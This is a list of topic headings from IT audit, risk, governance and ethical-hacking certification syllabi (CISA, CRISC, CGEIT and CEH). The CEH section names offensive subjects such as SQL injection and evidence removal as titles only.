Risk management methodologies and tools
Use of control frameworks (e.g., CobiT, COSO, ISO 17799)
Practices for monitoring and reporting of IT performance
Benefits management practices for CISA Certification
Processes for managing emergency changes to the production systems
Certified in Risk and Information Control (CRISC - “see-risk”) - ISACA
Risk Identification Assessment and Evaluation (RI)
Risk Response (RR)
Risk Monitoring (RM)
IS Control Design and Implementation (CD)
IS Control Monitoring and Maintenance (MM)
Certified in the Governance of Enterprise IT (CGEIT) - ISACA
For experienced IT governance personnel.
Certified Ethical Hacker (CEH) - EC-Council
Required for admin at US Govt
Penetration testing methodologies
Stealthy network recon
Passive traffic identification
Remote root vulnerability exploitation
Privilege escalation hacking
Remote access trojan hacking
Running shellcode in RAM vs. on disk
Breaking IP-based ACLs via spoofing
Abusing Windows Named Pipes for Domain Impersonation
Evidence removal and anti-forensics
Attacking network infrastructure devices
Hacking by brute forcing remotely
Hiding exploit payloads in jpeg and gif image files
Hacking Web Applications
Breaking into databases with SQL Injection
Cross Site Scripting hacking
Hacking into Cisco routers
Justifying a penetration test to management & customers